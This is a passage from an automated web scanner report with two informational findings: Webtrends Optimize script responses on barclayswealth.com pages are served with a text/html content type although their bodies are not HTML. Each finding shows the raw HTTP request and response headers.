Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91f4bce4a535901afd613eb60454f94b522ae5a0f92f493ea819c172569003b3b509f70f9aa24b28c9cf18bd706efe47c3f107ad579e17c40820ea7d59a73ecc0eda6324f0e772cd4dac1acc2f3c2c715f94f6c6b2c43b6d93e0b9de8bcdf8dfa4b5163d49b4cecec1895d4011d61c3d1d8301890b0122218051c14dfda0b1fa50b53a5c57e46e2206617f97330e60312ff4b22c719037281a32451b6c03c6c349c599a4e47ae3017e8a76e43e41167a6fe9b7be30030f4013e12cd9e395ad1bdc1d009a8a2413fa43c24609a524fd930fc9a171fed4e5610d4234e974a0fd4e2c6c04779992691c4b8b62cdf3fa2bed81c19933ff0285010f665f2dccd90735341116e1b45d141b87ac89150a13e6b1e44b8456ac111cddceba90ec6f572f05b14f902e092134a551b7659984fd9b0d3e6ff8549e55d2c4f1acab1a7c41315ae693139b015aeda9d916bccefe268c87ae8370104ab216424f6b05635a27e865f23ba918e6765327398632c66210880e14d920714634ee0e278e5c575e979ed70fa30591e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804039621c3d0fd96fec5706fb0ea1a49c19523d6a84f9321f3d900393f7d41e52995adf5d52fe17039304c456396481d1e49dace94e56a6027d2c0195ad86e47e588d47e3f37d227744aa3a98790ad4024c38176c6d2d2766f2a5081ba0ae048df7dc2f816f6a519c715ffa290f98202a531a1c6c28d8f4eaddf44fb79f8409c8b6763b513b3804dd447fe3ff1ba45e3b16244d2ef7115e3271dc0fc857ca002d000ef252a67b2e658db2c1312f56fc51abde481809fae009f051222bc3f75f269c9e10f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3d4bd8856960db4fb7291b054e9cd9

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91f4bce4a535901afd613eb60454f94b522ae5a0f92f493ea819c172569003b3b509f70f9aa24b28c9cf18bd706efe47c3f107ad579e17c40820ea7d59a73ecc0eda6324f0e772cd4dac1acc2f3c2c715f94f6c6b2c43b6d93e0b9de8bcdf8dfa4b5163d49b4cecec1895d4011d61c3d1d8301890b0122218051c14dfda0b1fa50b53a5c57e46e2206617f97330e60312ff4b22c719037281a32451b6c03c6c349c599a4e47ae3017e8a76e43e41167a6fe9b7be30030f4013e12cd9e395ad1bdc1d009a8a2413fa43c24609a524fd930fc9a171fed4e5610d4234e974a0fd4e2c6c04779992691c4b8b62cdf3fa2bed81c19933ff0285010f665f2dccd90735341116e1b45d141b87ac89150a13e6b1e44b8456ac111cddceba90ec6f572f05b14f902e092134a551b7659984fd9b0d3e6ff8549e55d2c4f1acab1a7c41315ae693139b015aeda9d916bccefe268c87ae8370104ab216424f6b05635a27e865f23ba918e6765327398632c66210880e14d920714634ee0e278e5c575e979ed70fa30591e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804039621c3d0fd96fec5706fb0ea1a49c19523d6a84f9321f3d900393f7d41e52995adf5d52fe17039304c456396481d1e49dace94e56a6027d2c0195ad86e47e588d47e3f37d227744aa3a98790ad4024c38176c6d2d2766f2a5081ba0ae048df7dc2f816f6a519c715ffa290f98202a531a1c6c28d8f4eaddf44fb79f8409c8b6763b513b3804dd447fe3ff1ba45e3b16244d2ef7115e3271dc0fc857ca002d000ef252a67b2e658db2c1312f56fc51abde481809fae009f051222bc3f75f269c9e10f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3d4bd8856960db4fb7291b054e9cd9 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/debit-cards.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4B58DD7DB5603E2D9048FE4EA69A8782; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200599559; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=fcdcc722e9320537bb59

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:15 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A3D550880A45CA7718800D08622321F7; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.66. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91f4bce4a535901afd613eb60454fa46097eb6f5ab7b1e3dae4bc72151c352b1b959ab0ecaf04a719d9e19bb246bab45c4aa04fd06c740950028ba700ca16ecf5bdc6371a3b275994dab489c273e2e7859c3f2c7b5936b6693e4bade889dfddfafe5153c44b79d9a958f0b401687173f45d4548d0b037026d003cd1cf9f6b4fe56bb3b0854e76b2109372bc26604356529febd2b70c466264c35471b3c05939012cf9bf7b829b7527a8821b13344122969eee3bb6654591012bb2984e190fe10d31600c8df2213f64cca180ba573aace50c9f477fad5ee390a1e61e926a0a8497e685673c3c1691948876ac8f7fa2bed81c19933ff0285010f665f2dccd90735341116e1b45d141b87ac89150a13e6b1e44b8456ac111cddceba90ec6f572f05b14f902e092134a551b7659984fd9b0d3e6ff8549e55d2c4f1acab1a7c41315ae693139b0154eda9d916bccefe268c87ae8370104ab216424f6b05635a27e865f23ba918e6765327398632c66210880e14d920714634ee0e278e5c575e979ed70fa30591e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804009b7a9785aec6aa907369e4ec4b4ecbc62181a3139473a185596f6e7c1ee82cc2aff2d32cb37e3f38461430c44548181f829b96e5396a29d5cf195d886516e38add783733d57b251aa8a98393ad4374c6812696d1d3246e205fd7bc5ce04f8a2fc4fd1aa3a119c545fcf0c2f58806f334fcc0978cdb4daeda47f429aa17cbd86b6cb319e5814ad94fa96ff6b845b1b7681589ba7340bf704fcaf8872bf7568a04be232d6ceee90f8d7c1217f46dc71beeb48e8b9ffc57c2054722bd3073a43b9db30f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e381e8a826f61d24fb7291b020a4813  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91f4bce4a535901afd613eb60454fa46097eb6f5ab7b1e3dae4bc72151c352b1b959ab0ecaf04a719d9e19bb246bab45c4aa04fd06c740950028ba700ca16ecf5bdc6371a3b275994dab489c273e2e7859c3f2c7b5936b6693e4bade889dfddfafe5153c44b79d9a958f0b401687173f45d4548d0b037026d003cd1cf9f6b4fe56bb3b0854e76b2109372bc26604356529febd2b70c466264c35471b3c05939012cf9bf7b829b7527a8821b13344122969eee3bb6654591012bb2984e190fe10d31600c8df2213f64cca180ba573aace50c9f477fad5ee390a1e61e926a0a8497e685673c3c1691948876ac8f7fa2bed81c19933ff0285010f665f2dccd90735341116e1b45d141b87ac89150a13e6b1e44b8456ac111cddceba90ec6f572f05b14f902e092134a551b7659984fd9b0d3e6ff8549e55d2c4f1acab1a7c41315ae693139b0154eda9d916bccefe268c87ae8370104ab216424f6b05635a27e865f23ba918e6765327398632c66210880e14d920714634ee0e278e5c575e979ed70fa30591e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804009b7a9785aec6aa907369e4ec4b4ecbc62181a3139473a185596f6e7c1ee82cc2aff2d32cb37e3f38461430c44548181f829b96e5396a29d5cf195d886516e38add783733d57b251aa8a98393ad4374c6812696d1d3246e205fd7bc5ce04f8a2fc4fd1aa3a119c545fcf0c2f58806f334fcc0978cdb4daeda47f429aa17cbd86b6cb319e5814ad94fa96ff6b845b1b7681589ba7340bf704fcaf8872bf7568a04be232d6ceee90f8d7c1217f46dc71beeb48e8b9ffc57c2054722bd3073a43b9db30f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e381e8a826f61d24fb7291b020a4813

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91f4bce4a535901afd613eb60454fa46097eb6f5ab7b1e3dae4bc72151c352b1b959ab0ecaf04a719d9e19bb246bab45c4aa04fd06c740950028ba700ca16ecf5bdc6371a3b275994dab489c273e2e7859c3f2c7b5936b6693e4bade889dfddfafe5153c44b79d9a958f0b401687173f45d4548d0b037026d003cd1cf9f6b4fe56bb3b0854e76b2109372bc26604356529febd2b70c466264c35471b3c05939012cf9bf7b829b7527a8821b13344122969eee3bb6654591012bb2984e190fe10d31600c8df2213f64cca180ba573aace50c9f477fad5ee390a1e61e926a0a8497e685673c3c1691948876ac8f7fa2bed81c19933ff0285010f665f2dccd90735341116e1b45d141b87ac89150a13e6b1e44b8456ac111cddceba90ec6f572f05b14f902e092134a551b7659984fd9b0d3e6ff8549e55d2c4f1acab1a7c41315ae693139b0154eda9d916bccefe268c87ae8370104ab216424f6b05635a27e865f23ba918e6765327398632c66210880e14d920714634ee0e278e5c575e979ed70fa30591e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804009b7a9785aec6aa907369e4ec4b4ecbc62181a3139473a185596f6e7c1ee82cc2aff2d32cb37e3f38461430c44548181f829b96e5396a29d5cf195d886516e38add783733d57b251aa8a98393ad4374c6812696d1d3246e205fd7bc5ce04f8a2fc4fd1aa3a119c545fcf0c2f58806f334fcc0978cdb4daeda47f429aa17cbd86b6cb319e5814ad94fa96ff6b845b1b7681589ba7340bf704fcaf8872bf7568a04be232d6ceee90f8d7c1217f46dc71beeb48e8b9ffc57c2054722bd3073a43b9db30f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e381e8a826f61d24fb7291b020a4813 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=366C424481F456C6E4820AE57695F69C; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d01953baa; _wt.mode-79569=fcdcc722e93200feed40

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:13 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=461B874546EDC251C6A7440F7F10048D; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.67. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097cbad24c4491d2a045edacbe7667b7643201395ddd85935675175c2e3597d81ec7f77c301528f0861619836210bd15e01494161f679046cd3ea440fb65c7801b6cdb15c0785ae23675645c05656ca824ea267721a956b4efe2a70bb4a76e10e7dd20fd29b3a81b5750cdf2a0cc8797498b0d77d29a74fbf96b7b6e3c60a8857ef6a272aa8452aec9d28be22b017eee772082045063f7e71611fc50474a14b96c5ab6704433fe2c1924450cbb12cc6dc90af1baf8eb7312f98881c095128342ff6ebd195c91f75d256f50ac52435d87d5eec6987458d691f829e41c42bb155bb08fcd5bd1f74fc32416419512e7cb5a6cd89db8810cdfa0a51c643857d59951e507d1400b9b073b6ab3b36c8eaffeb0f929970df96436a30b4fa6470879f0efba452729e84590365c8753a7ac1acd32ddb2443389c60abd3a6dab46c4a608f50c9e15de0037ed6b1ae3319b1bcb723ee78c35dc07ea0cc864222e705f96ffd2e9d56d66cce5eb8ad9c8ad8aafe3123b4ab7c9cfcad9054541d04d6612d704df5a022577d15ecc48aaf2e4a950b26f0b05e66a7702622fc0625c313579f3bd79799735204a6510146c52939f4ccd9df3e32fb15379db23b73344102a3eeae3eb3751524747b92984b3c5ad41dd4a57ce8e2316fd42cb4c09ae70fb970ecda573add4e4390d4333b37ba6fb487f3a5629cc933a1a4680689efff139f492a0fc588034a0410477017f8a91175c5f0703e9e61c1b0b8ebadb470b46e8bdee41d551bb144dd49fbbcfb06257204ab318c420597c3aab5de028ca8ead9c0c6361a45dc91dc1caffd1833127563356b0db5ec60255faaddf01a089ae4e888fd6cb384a11d05b6a436a147e0b449029e123a75f8010173061ce75992612c40813de24754e6cef0f27c55d400e8a8f9604f546d5f449a6b580f8fd265cac7ff7d2aa2f84703550ddfe041297690c59ec1f167d8dfc46fcf9b6a54c900e3f0f871e03907594d7fec7fc962263bfbe4c4fcbc37384fe4c9773a3d90f3d6c7a1ee82496fef6892ae07e3c37421263991e1d4f4f859c94e666602185c0195e8e6e40b68dd776316180742540a5fe8197a61073948b75c3d2d2743d215580b95fe6198878c5ae4afea01fc315fff1c0f08454a431f6ca93989158c79e52e227f317cb936862b716ee9313c310fb3fa7b844b4b7341bd9be7417b77d4ac8f0843cee10e532d1554f1ca8eb1ed62e045feb7103ee4dac  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097cbad24c4491d2a045edacbe7667b7643201395ddd85935675175c2e3597d81ec7f77c301528f0861619836210bd15e01494161f679046cd3ea440fb65c7801b6cdb15c0785ae23675645c05656ca824ea267721a956b4efe2a70bb4a76e10e7dd20fd29b3a81b5750cdf2a0cc8797498b0d77d29a74fbf96b7b6e3c60a8857ef6a272aa8452aec9d28be22b017eee772082045063f7e71611fc50474a14b96c5ab6704433fe2c1924450cbb12cc6dc90af1baf8eb7312f98881c095128342ff6ebd195c91f75d256f50ac52435d87d5eec6987458d691f829e41c42bb155bb08fcd5bd1f74fc32416419512e7cb5a6cd89db8810cdfa0a51c643857d59951e507d1400b9b073b6ab3b36c8eaffeb0f929970df96436a30b4fa6470879f0efba452729e84590365c8753a7ac1acd32ddb2443389c60abd3a6dab46c4a608f50c9e15de0037ed6b1ae3319b1bcb723ee78c35dc07ea0cc864222e705f96ffd2e9d56d66cce5eb8ad9c8ad8aafe3123b4ab7c9cfcad9054541d04d6612d704df5a022577d15ecc48aaf2e4a950b26f0b05e66a7702622fc0625c313579f3bd79799735204a6510146c52939f4ccd9df3e32fb15379db23b73344102a3eeae3eb3751524747b92984b3c5ad41dd4a57ce8e2316fd42cb4c09ae70fb970ecda573add4e4390d4333b37ba6fb487f3a5629cc933a1a4680689efff139f492a0fc588034a0410477017f8a91175c5f0703e9e61c1b0b8ebadb470b46e8bdee41d551bb144dd49fbbcfb06257204ab318c420597c3aab5de028ca8ead9c0c6361a45dc91dc1caffd1833127563356b0db5ec60255faaddf01a089ae4e888fd6cb384a11d05b6a436a147e0b449029e123a75f8010173061ce75992612c40813de24754e6cef0f27c55d400e8a8f9604f546d5f449a6b580f8fd265cac7ff7d2aa2f84703550ddfe041297690c59ec1f167d8dfc46fcf9b6a54c900e3f0f871e03907594d7fec7fc962263bfbe4c4fcbc37384fe4c9773a3d90f3d6c7a1ee82496fef6892ae07e3c37421263991e1d4f4f859c94e666602185c0195e8e6e40b68dd776316180742540a5fe8197a61073948b75c3d2d2743d215580b95fe6198878c5ae4afea01fc315fff1c0f08454a431f6ca93989158c79e52e227f317cb936862b716ee9313c310fb3fa7b844b4b7341bd9be7417b77d4ac8f0843cee10e532d1554f1ca8eb1ed62e045feb7103ee4dac

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097cbad24c4491d2a045edacbe7667b7643201395ddd85935675175c2e3597d81ec7f77c301528f0861619836210bd15e01494161f679046cd3ea440fb65c7801b6cdb15c0785ae23675645c05656ca824ea267721a956b4efe2a70bb4a76e10e7dd20fd29b3a81b5750cdf2a0cc8797498b0d77d29a74fbf96b7b6e3c60a8857ef6a272aa8452aec9d28be22b017eee772082045063f7e71611fc50474a14b96c5ab6704433fe2c1924450cbb12cc6dc90af1baf8eb7312f98881c095128342ff6ebd195c91f75d256f50ac52435d87d5eec6987458d691f829e41c42bb155bb08fcd5bd1f74fc32416419512e7cb5a6cd89db8810cdfa0a51c643857d59951e507d1400b9b073b6ab3b36c8eaffeb0f929970df96436a30b4fa6470879f0efba452729e84590365c8753a7ac1acd32ddb2443389c60abd3a6dab46c4a608f50c9e15de0037ed6b1ae3319b1bcb723ee78c35dc07ea0cc864222e705f96ffd2e9d56d66cce5eb8ad9c8ad8aafe3123b4ab7c9cfcad9054541d04d6612d704df5a022577d15ecc48aaf2e4a950b26f0b05e66a7702622fc0625c313579f3bd79799735204a6510146c52939f4ccd9df3e32fb15379db23b73344102a3eeae3eb3751524747b92984b3c5ad41dd4a57ce8e2316fd42cb4c09ae70fb970ecda573add4e4390d4333b37ba6fb487f3a5629cc933a1a4680689efff139f492a0fc588034a0410477017f8a91175c5f0703e9e61c1b0b8ebadb470b46e8bdee41d551bb144dd49fbbcfb06257204ab318c420597c3aab5de028ca8ead9c0c6361a45dc91dc1caffd1833127563356b0db5ec60255faaddf01a089ae4e888fd6cb384a11d05b6a436a147e0b449029e123a75f8010173061ce75992612c40813de24754e6cef0f27c55d400e8a8f9604f546d5f449a6b580f8fd265cac7ff7d2aa2f84703550ddfe041297690c59ec1f167d8dfc46fcf9b6a54c900e3f0f871e03907594d7fec7fc962263bfbe4c4fcbc37384fe4c9773a3d90f3d6c7a1ee82496fef6892ae07e3c37421263991e1d4f4f859c94e666602185c0195e8e6e40b68dd776316180742540a5fe8197a61073948b75c3d2d2743d215580b95fe6198878c5ae4afea01fc315fff1c0f08454a431f6ca93989158c79e52e227f317cb936862b716ee9313c310fb3fa7b844b4b7341bd9be7417b77d4ac8f0843cee10e532d1554f1ca8eb1ed62e045feb7103ee4dac HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/important-information.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
